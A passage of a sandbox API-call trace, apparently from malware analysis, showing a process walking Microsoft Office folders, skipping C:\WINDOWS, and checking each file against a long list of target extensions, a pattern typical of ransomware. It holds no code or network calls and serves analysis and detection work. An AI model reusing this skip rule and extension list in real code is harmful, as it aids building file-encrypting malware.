[0305.138] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHT", cAlternateFileName="")) returned 0 [0305.139] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0305.139] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40d7ef8 | out: hHeap=0x470000) returned 1 [0305.139] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc7c5a96a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc7c5a96a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd9d4a250, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x163c40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="UmOutlookAddin.dll", cAlternateFileName="UMOUTL~1.DLL")) returned 1 [0305.139] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40c7ef0 | out: hHeap=0x470000) returned 1 [0305.144] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1b81e2e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1b680, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="AdeModule.dll", cAlternateFileName="ADEMOD~1.DLL")) returned 1 [0306.361] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0306.361] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2ad8211, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc38b3c05, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc3bd4d47, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Style", cAlternateFileName="")) returned 1 [0306.367] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0306.367] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2ad8211, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc38b3c05, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc3bd4d47, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Style", cAlternateFileName="")) returned 0 [0306.367] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0306.367] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0306.367] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x17774bfd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17774bfd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="BORDERS", cAlternateFileName="")) returned 1 [0306.371] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0306.371] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4cf4318, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xf7e60, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="BSTORM.DLL", cAlternateFileName="")) returned 1 [0306.376] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0306.376] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc7c80c48, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc7c80c48, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xca4703d4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2ee58, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="CONTAB32.DLL", cAlternateFileName="")) returned 1 [0306.379] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0306.379] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b60d2f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6b60d2f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6b60d2f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x90e8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DELIMWIN.FAE", cAlternateFileName="")) returned 1 [0306.380] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0306.380] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b6c9560, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5bd0a0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="cpprest140_2_6.dll", cAlternateFileName="CPPRES~1.DLL")) returned 1 [0306.381] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41a3008 | out: hHeap=0x470000) returned 1 [0306.381] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d9058b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4db6809, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 0 [0306.381] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0306.381] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0306.382] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d9058b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4d9058b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0306.382] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0306.382] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0306.382] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4d40834, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x17dec0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="DRILLDWN.DLL", cAlternateFileName="")) returned 1 [0306.391] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0306.391] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca90ec5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb548de7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff0bc27, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0306.391] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0306.392] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0306.392] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4dd9107, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x15f450, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="GANTT.DLL", cAlternateFileName="")) returned 1 [0306.393] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41b3010 | out: hHeap=0x470000) returned 1 [0306.393] FindNextFileW (in: hFindFile=0x3948428, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b0f9971, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ManagedObjects", cAlternateFileName="MANAGE~1")) returned 1 [0306.393] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41b3010 | out: hHeap=0x470000) returned 1 [0306.393] FindNextFileW (in: hFindFile=0x3948428, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18681a5c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18681a5c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Servers", cAlternateFileName="")) returned 1 [0306.393] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41b3010 | out: hHeap=0x470000) returned 1 [0306.393] FindNextFileW (in: hFindFile=0x3948428, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18681a5c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18681a5c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Servers", cAlternateFileName="")) returned 0 [0306.393] FindClose (in: hFindFile=0x3948428 | out: hFindFile=0x3948428) returned 1 [0306.394] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41a3008 | out: hHeap=0x470000) returned 1 [0306.394] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1865b8d4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1865b8d4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Verisign", cAlternateFileName="")) returned 1 [0306.396] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41b3010 | out: hHeap=0x470000) returned 1 [0306.396] FindNextFileW (in: hFindFile=0x3948b28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1865b8d4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Components", cAlternateFileName="COMPON~1")) returned 0 [0306.396] FindClose (in: hFindFile=0x3948b28 | out: hFindFile=0x3948b28) returned 1 [0306.396] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41a3008 | out: hHeap=0x470000) returned 1 [0306.396] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1865b8d4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1865b8d4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Verisign", cAlternateFileName="")) returned 0 [0306.396] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0306.397] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0306.397] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18681a5c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Sounds", cAlternateFileName="")) returned 1 [0306.399] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41a3008 | out: hHeap=0x470000) returned 1 [0306.399] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1907d846, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1907d846, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Places", cAlternateFileName="")) returned 1 [0306.524] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41a3008 | out: hHeap=0x470000) returned 1 [0306.525] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1bc991c1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1bc991c1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Things", cAlternateFileName="")) returned 1 [0306.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things") returned 68 [0306.526] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things") returned 1 [0306.526] lstrlenW (lpString="Things") returned 6 [0306.526] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="Things") returned -1 [0306.526] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4182ff8 [0306.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things") returned 68 [0306.526] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Sounds\\Things\\*", lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1bc991c1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1bc991c1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x3947c28 [0306.560] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1bc991c1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1bc991c1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0306.561] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ad3e4a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ad3e4a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18afa0b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc8fc, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="CAN.WAV", cAlternateFileName="")) returned 1 [0306.561] lstrlenW (lpString="CAN.WAV") returned 7 [0306.561] lstrlenW (lpString=".1cd") returned 4 [0306.561] lstrcmpiW (lpString1=".1cd", lpString2=".WAV") returned -1 [0306.561] lstrlenW (lpString=".3ds") returned 4 [0306.561] lstrcmpiW (lpString1=".3ds", lpString2=".WAV") returned -1 [0306.561] lstrlenW (lpString=".3fr") returned 4 [0306.561] lstrcmpiW (lpString1=".3fr", lpString2=".WAV") returned -1 [0306.561] lstrlenW (lpString=".3g2") returned 4 [0306.561] lstrcmpiW (lpString1=".3g2", lpString2=".WAV") returned -1 [0306.561] lstrlenW (lpString=".3gp") returned 4 [0306.561] lstrcmpiW (lpString1=".3gp", lpString2=".WAV") returned -1 [0306.561] lstrlenW (lpString=".7z") returned 3 [0306.561] lstrcmpiW (lpString1=".7z", lpString2="WAV") returned -1 [0306.561] lstrlenW (lpString=".accda") returned 6 [0306.561] lstrcmpiW (lpString1=".accda", lpString2="AN.WAV") returned -1 [0306.561] lstrlenW (lpString=".accdb") returned 6 [0306.561] lstrcmpiW (lpString1=".accdb", lpString2="AN.WAV") returned -1 [0306.561] lstrlenW (lpString=".accdc") returned 6 [0306.561] lstrcmpiW (lpString1=".accdc", lpString2="AN.WAV") returned -1 [0306.562] lstrlenW (lpString=".accde") returned 6 [0306.562] lstrcmpiW (lpString1=".accde", lpString2="AN.WAV") returned -1 [0306.562] lstrlenW (lpString=".accdt") returned 6 [0306.562] lstrcmpiW (lpString1=".accdt", lpString2="AN.WAV") returned -1 [0306.562] lstrlenW (lpString=".accdw") returned 6 [0306.562] lstrcmpiW (lpString1=".accdw", lpString2="AN.WAV") returned -1 [0306.562] lstrlenW (lpString=".adb") returned 4 [0306.562] lstrcmpiW (lpString1=".adb", lpString2=".WAV") returned -1 [0306.562] lstrlenW (lpString=".adp") returned 4 [0306.562] lstrcmpiW (lpString1=".adp", lpString2=".WAV") returned -1 [0306.562] lstrlenW (lpString=".ai") returned 3 [0306.562] lstrcmpiW (lpString1=".ai", lpString2="WAV") returned -1 [0306.562] lstrlenW (lpString=".ai3") returned 4 [0306.562] lstrcmpiW (lpString1=".ai3", lpString2=".WAV") returned -1 [0306.562] lstrlenW (lpString=".ai4") returned 4 [0306.562] lstrcmpiW (lpString1=".ai4", lpString2=".WAV") returned -1 [0306.562] lstrlenW (lpString=".ai5") returned 4 [0306.562] lstrcmpiW (lpString1=".ai5", lpString2=".WAV") returned -1 [0306.562] lstrlenW (lpString=".ai6") returned 4 [0306.562] lstrcmpiW (lpString1=".ai6", lpString2=".WAV") returned -1 [0306.562] lstrlenW (lpString=".ai7") returned 4 [0306.562] lstrcmpiW (lpString1=".ai7", lpString2=".WAV") returned -1 [0306.562] lstrlenW (lpString=".ai8") returned 4 [0306.562] lstrcmpiW (lpString1=".ai8", lpString2=".WAV") returned -1 [0306.562] lstrlenW (lpString=".anim") returned 5 [0306.562] lstrcmpiW (lpString1=".anim", lpString2="N.WAV") returned -1 [0306.563] lstrlenW (lpString=".arw") returned 4 [0306.563] lstrcmpiW (lpString1=".arw", lpString2=".WAV") returned -1 [0306.563] lstrlenW (lpString=".as") returned 3 [0306.563] lstrcmpiW (lpString1=".as", lpString2="WAV") returned -1 [0306.563] lstrlenW (lpString=".asa") returned 4 [0306.563] lstrcmpiW (lpString1=".asa", lpString2=".WAV") returned -1 [0306.563] lstrlenW (lpString=".asc") returned 4 [0306.563] lstrcmpiW (lpString1=".asc", lpString2=".WAV") returned -1 [0306.563] lstrlenW (lpString=".ascx") returned 5 [0306.563] lstrcmpiW (lpString1=".ascx", lpString2="N.WAV") returned -1 [0306.563] lstrlenW (lpString=".asm") returned 4 [0306.563] lstrcmpiW (lpString1=".asm", lpString2=".WAV") returned -1 [0306.563] lstrlenW (lpString=".asmx") returned 5 [0306.563] lstrcmpiW (lpString1=".asmx", lpString2="N.WAV") returned -1 [0306.563] lstrlenW (lpString=".asp") returned 4 [0306.563] lstrcmpiW (lpString1=".asp", lpString2=".WAV") returned -1 [0306.563] lstrlenW (lpString=".aspx") returned 5 [0306.563] lstrcmpiW (lpString1=".aspx", lpString2="N.WAV") returned -1 [0306.563] lstrlenW (lpString=".asr") returned 4 [0306.563] lstrcmpiW (lpString1=".asr", lpString2=".WAV") returned -1 [0306.563] lstrlenW (lpString=".asx") returned 4 [0306.563] lstrcmpiW (lpString1=".asx", lpString2=".WAV") returned -1 [0306.563] lstrlenW (lpString=".avi") returned 4 [0306.563] lstrcmpiW (lpString1=".avi", lpString2=".WAV") returned -1 [0306.563] lstrlenW (lpString=".avs") returned 4 [0306.563] lstrcmpiW (lpString1=".avs", lpString2=".WAV") returned -1 [0306.564] lstrlenW (lpString=".backup") returned 7 [0306.564] lstrcmpiW (lpString1=".backup", lpString2="CAN.WAV") returned -1 [0306.564] lstrlenW (lpString=".bak") returned 4 [0306.564] lstrcmpiW (lpString1=".bak", lpString2=".WAV") returned -1 [0306.564] lstrlenW (lpString=".bay") returned 4 [0306.564] lstrcmpiW (lpString1=".bay", lpString2=".WAV") returned -1 [0306.564] lstrlenW (lpString=".bd") returned 3 [0306.564] lstrcmpiW (lpString1=".bd", lpString2="WAV") returned -1 [0306.564] lstrlenW (lpString=".bin") returned 4 [0306.564] lstrcmpiW (lpString1=".bin", lpString2=".WAV") returned -1 [0306.564] lstrlenW (lpString=".bmp") returned 4 [0306.564] lstrcmpiW (lpString1=".bmp", lpString2=".WAV") returned -1 [0306.564] lstrlenW (lpString=".bz2") returned 4 [0306.564] lstrcmpiW (lpString1=".bz2", lpString2=".WAV") returned -1 [0306.564] lstrlenW (lpString=".c") returned 2 [0306.564] lstrcmpiW (lpString1=".c", lpString2="AV") returned -1 [0306.564] lstrlenW (lpString=".cdr") returned 4 [0306.564] lstrcmpiW (lpString1=".cdr", lpString2=".WAV") returned -1 [0306.564] lstrlenW (lpString=".cer") returned 4 [0306.564] lstrcmpiW (lpString1=".cer", lpString2=".WAV") returned -1 [0306.564] lstrlenW (lpString=".cf") returned 3 [0306.564] lstrcmpiW (lpString1=".cf", lpString2="WAV") returned -1 [0306.564] lstrlenW (lpString=".cfc") returned 4 [0306.564] lstrcmpiW (lpString1=".cfc", lpString2=".WAV") returned -1 [0306.565] lstrlenW (lpString=".cfm") returned 4 [0306.565] lstrcmpiW (lpString1=".cfm", lpString2=".WAV") returned -1 [0306.565] lstrlenW (lpString=".cfml") returned 5 [0306.565] lstrcmpiW (lpString1=".cfml", lpString2="N.WAV") returned -1 [0306.565] lstrlenW (lpString=".cfu") returned 4 [0306.565] lstrcmpiW (lpString1=".cfu", lpString2=".WAV") returned -1 [0306.565] lstrlenW (lpString=".chm") returned 4 [0306.565] lstrcmpiW (lpString1=".chm", lpString2=".WAV") returned -1 [0306.565] lstrlenW (lpString=".cin") returned 4 [0306.565] lstrcmpiW (lpString1=".cin", lpString2=".WAV") returned -1 [0306.565] lstrlenW (lpString=".class") returned 6 [0306.565] lstrcmpiW (lpString1=".class", lpString2="AN.WAV") returned -1 [0306.565] lstrlenW (lpString=".clx") returned 4 [0306.565] lstrcmpiW (lpString1=".clx", lpString2=".WAV") returned -1 [0306.565] lstrlenW (lpString=".config") returned 7 [0306.565] lstrcmpiW (lpString1=".config", lpString2="CAN.WAV") returned -1 [0306.565] lstrlenW (lpString=".cpp") returned 4 [0306.565] lstrcmpiW (lpString1=".cpp", lpString2=".WAV") returned -1 [0306.565] lstrlenW (lpString=".cr2") returned 4 [0306.565] lstrcmpiW (lpString1=".cr2", lpString2=".WAV") returned -1 [0306.565] lstrlenW (lpString=".crt") returned 4 [0306.565] lstrcmpiW (lpString1=".crt", lpString2=".WAV") returned -1 [0306.566] lstrlenW (lpString=".crw") returned 4 [0306.566] lstrcmpiW (lpString1=".crw", lpString2=".WAV") returned -1 [0306.566] lstrlenW (lpString=".cs") returned 3 [0306.566] lstrcmpiW (lpString1=".cs", lpString2="WAV") returned -1 [0306.566] lstrlenW (lpString=".css") returned 4 [0306.566] lstrcmpiW (lpString1=".css", lpString2=".WAV") returned -1 [0306.566] lstrlenW (lpString=".csv") returned 4 [0306.566] lstrcmpiW (lpString1=".csv", lpString2=".WAV") returned -1 [0306.566] 